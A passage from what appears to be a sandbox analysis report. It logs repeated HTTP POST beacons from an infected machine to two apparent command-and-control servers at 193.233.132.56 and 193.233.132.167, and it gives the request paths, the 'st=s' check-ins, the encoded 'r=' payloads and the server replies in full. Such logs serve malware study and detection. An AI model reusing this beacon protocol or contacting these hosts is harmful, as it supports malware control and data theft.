                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.896151066 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1340192.168.2.551194193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.102880001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.349529982 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1341192.168.2.551195193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.238775015 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.479494095 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1342192.168.2.551196193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.596739054 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.851206064 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1343192.168.2.551197193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.724225998 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:08.970350981 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1344192.168.2.551198193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.177392006 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.421797037 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1345192.168.2.551199193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.326678038 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.575186968 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1346192.168.2.551200193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.677414894 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.935048103 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1347192.168.2.551201193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:09.824156046 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.071249962 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1348192.168.2.551202193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.273195982 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.520473957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1349192.168.2.551203193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.406373978 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.646325111 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1350192.168.2.551204193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.774246931 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.027766943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1351192.168.2.551205193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.895679951 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.145231009 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1352192.168.2.551206193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.363374949 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.611327887 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1353192.168.2.551207193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.499037981 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.747673988 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1354192.168.2.551208193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.861920118 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.107544899 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1355192.168.2.551209193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.996154070 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.245441914 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1356192.168.2.551210193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.438359976 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
